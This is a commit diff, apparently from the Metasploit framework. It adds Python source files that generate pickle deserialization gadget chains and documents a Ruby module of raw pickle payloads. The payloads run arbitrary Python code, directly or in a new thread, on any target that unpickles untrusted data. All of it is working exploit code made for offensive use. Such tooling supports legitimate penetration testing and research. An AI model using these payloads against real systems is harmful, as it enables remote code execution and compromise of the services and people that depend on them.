Add source code for Python deserialization gadgets
This commit is contained in:
parent
fb073cf21a
commit
e5635c4bfd
|
@ -0,0 +1,9 @@
|
|||
import pickle
|
||||
|
||||
class GadgetChain:
|
||||
def __reduce__(self):
|
||||
return __builtins__.exec, ('#{escaped}',)
|
||||
|
||||
if __name__ == '__main__':
|
||||
pickled = pickle.dumps(GadgetChain(), protocol=0)
|
||||
print(repr(pickled.decode()))
|
|
@ -0,0 +1,14 @@
|
|||
import pickle
|
||||
import threading
|
||||
|
||||
class CreateThread:
|
||||
def __reduce__(self):
|
||||
return threading.Thread, (None, __builtins__.exec, None, ('#{escaped}',))
|
||||
|
||||
class GadgetChain:
|
||||
def __reduce__(self):
|
||||
return threading.Thread.start, (CreateThread(),)
|
||||
|
||||
if __name__ == '__main__':
|
||||
pickled = pickle.dumps(GadgetChain(), protocol=0)
|
||||
print(repr(pickled.decode()))
|
|
@ -6,12 +6,14 @@ module Msf
|
|||
# Python deserialization class
|
||||
class PythonDeserialization
|
||||
# That could be in the future a list of payloads used to exploit the Python deserialization vulnerability.
|
||||
# Payload source files are available in external/source/python_deserialization
|
||||
PAYLOADS = {
|
||||
# this payload will work with Python 3.x targets to execute Python code in place
|
||||
py3_exec: proc do |python_code|
|
||||
escaped = python_code.gsub(/[\\\n\r]/) { |t| "\\u00#{t.ord.to_s(16).rjust(2, '0')}" }
|
||||
%|c__builtin__\nexec\np0\n(V#{escaped}\np1\ntp2\nRp3\n.|
|
||||
end,
|
||||
# this payload will work with Python 3.x targets to execute Python code in a new thread
|
||||
py3_exec_threaded: proc do |python_code|
|
||||
escaped = python_code.gsub(/[\\\n\r]/) { |t| "\\u00#{t.ord.to_s(16).rjust(2, '0')}" }
|
||||
%|c__builtin__\ngetattr\np0\n(cthreading\nThread\np1\nVstart\np2\ntp3\nRp4\n(g1\n(Nc__builtin__\nexec\np5\nN(V#{escaped}\np6\ntp7\ntp8\nRp9\ntp10\nRp11\n.|
|
||||
|
|
Loading…
Reference in New Issue